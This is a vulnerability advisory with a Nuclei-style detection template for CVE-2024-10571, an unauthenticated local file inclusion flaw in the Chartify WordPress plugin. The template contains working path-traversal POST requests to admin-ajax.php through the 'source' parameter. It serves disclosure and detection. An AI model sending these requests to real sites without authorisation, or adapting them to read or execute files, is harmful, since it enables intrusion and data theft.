The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
PoC代码[已公开]
id: CVE-2024-10571
info:
name: Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion
author: iamnoooob,pdresearch
severity: critical
description: |
The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
reference:
- https://plugins.trac.wordpress.org/browser/chart-builder/tags/2.9.6/admin/partials/charts/actions/chart-builder-charts-actions-options.php?rev=3184238
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d4837258-c749-4194-926c-22b67e20c1fc?source=cve
- https://github.com/RandomRobbieBF/CVE-2024-10571
- https://nvd.nist.gov/vuln/detail/CVE-2024-10571
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10571
cwe-id: CWE-98,NVD-CWE-Other
epss-score: 0.80868
epss-percentile: 0.99116
cpe: cpe:2.3:a:ays-pro:chartify:*:*:*:*:free:wordpress:*:*
metadata:
vendor: ays-pro
product: chartify
framework: wordpress
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/chart-builder/"
tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page&
matchers:
- type: word
part: header
words:
- PHPSESSID
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/uninstall&type=chart-js HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page
matchers:
- type: dsl
dsl:
- contains_all(body, "ays-chart-heading-box", "View Documentation")
- status_code == 200
condition: and
# digest: 4b0a00483046022100c0dd2ea868dc5a516fe091228d493a9506d6f8b530e684f4a50dea4ac4086c33022100e2fb0ab94486a9418908ab5eaa1ffdd3e0fc2c84874aa5d72901ce834dac1729:922c64590222798bb761d5b6d8e72950